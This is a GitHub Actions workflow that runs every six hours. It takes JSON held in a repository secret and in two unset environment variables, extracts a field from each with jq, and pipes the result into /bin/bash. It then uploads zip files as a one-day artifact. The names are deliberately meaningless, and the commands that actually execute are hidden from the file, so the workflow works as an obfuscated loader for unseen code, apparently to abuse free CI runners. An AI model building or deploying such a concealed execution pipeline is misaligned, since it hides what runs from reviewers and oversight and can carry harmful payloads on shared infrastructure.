name: xingzoupingji
on:
  workflow_dispatch:

  schedule:
    - cron: '6 0,6,12,18 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xingzoupingji
        env:
          yird8: ${{ secrets.yird8 }}
        run: |
          printf '%s' "$yird8" | jq -r .v51638 | /bin/bash
          printf '%s' "$ohua84" | jq -r .kw6 | /bin/bash
          echo $gye060 | jq -r .ejf88 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: ENS6V9Pj
          path: "*.zip"
          retention-days: 1
